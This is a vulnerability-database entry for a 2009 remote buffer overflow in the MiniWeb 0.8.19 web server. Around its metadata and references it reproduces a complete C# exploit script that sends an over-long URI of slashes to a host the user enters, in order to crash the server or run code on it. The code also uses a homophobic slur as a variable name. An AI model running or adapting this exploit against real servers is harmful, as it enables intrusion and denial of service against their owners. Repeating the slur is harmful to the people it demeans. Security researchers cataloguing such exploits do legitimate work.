Details of VAR-E-200904-0440

ID

VAR-E-200904-0440

EDB ID

32923

TITLE

MiniWeb 0.8.19 - Remote Buffer Overflow - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32923

DESCRIPTION

MiniWeb 0.8.19 - Remote Buffer Overflow.. remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 32923

AFFECTED PRODUCTS

vendor:	miniweb	model:	-	scope:	eq	version:	0.8.19	Trust: 1.6
vendor:	stanley	model:	huang miniweb	scope:	eq	version:	0.8.19	Trust: 0.3

sources: BID: 34563 // EXPLOIT-DB: 32923 // EDBNET: 54424

EXPLOIT

source: https://www.securityfocus.com/bid/34563/info

MiniWeb is prone to a remote buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

/* BoF when requesting URI longer than 120~ */

using System;
using System.IO;
using System.Net;
using System.Text;

namespace idiot
{
class pf
{
static void Main(string[] args)
{
Console.Write("Enter host:\n");
string site = Console.ReadLine();
string uri = null;
try
{
for (int i = 0; i < 144; i++) { uri += "/"; }
HttpWebRequest request = (HttpWebRequest)
HttpWebRequest.Create(site + uri);
HttpWebResponse response = (HttpWebResponse)

request.GetResponse();

//any response we get means that exploit failed
if (response.GetResponseHeader("Content-Lenght") != "a")
{
Console.WriteLine("Exploit failed");
}

}
catch (Exception gayexception)
{
Console.WriteLine("Cannot connect");
Console.WriteLine("{0}", gayexception.Message);
}
}
}
}

Trust: 1.0

sources: EXPLOIT-DB: 32923

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 32923

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32923

TYPE

Remote Buffer Overflow

Trust: 1.0

sources: EXPLOIT-DB: 32923

CREDITS

e.wiZz!

Trust: 0.6

sources: EXPLOIT-DB: 32923

EXTERNAL IDS

db:	EXPLOIT-DB	id:	32923	Trust: 1.9
db:	BID	id:	34563	Trust: 1.9
db:	EDBNET	id:	54424	Trust: 0.6

sources: BID: 34563 // EXPLOIT-DB: 32923 // EDBNET: 54424

REFERENCES

url:	https://www.securityfocus.com/bid/34563/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/32923/	Trust: 0.6
url:	https://www.exploit-db.com/exploits/32923	Trust: 0.3
url:	http://sourceforge.net/projects/miniweb	Trust: 0.3

sources: BID: 34563 // EXPLOIT-DB: 32923 // EDBNET: 54424

SOURCES

db:	BID	id:	34563
db:	EXPLOIT-DB	id:	32923
db:	EDBNET	id:	54424

LAST UPDATE DATE

2022-07-27T09:33:43.707000+00:00

SOURCES UPDATE DATE

db:

BID

id:

34563

date:

2009-04-17T21:06:00

SOURCES RELEASE DATE

db:	BID	id:	34563	date:	2009-04-16T00:00:00
db:	EXPLOIT-DB	id:	32923	date:	2009-04-16T00:00:00
db:	EDBNET	id:	54424	date:	2009-04-16T00:00:00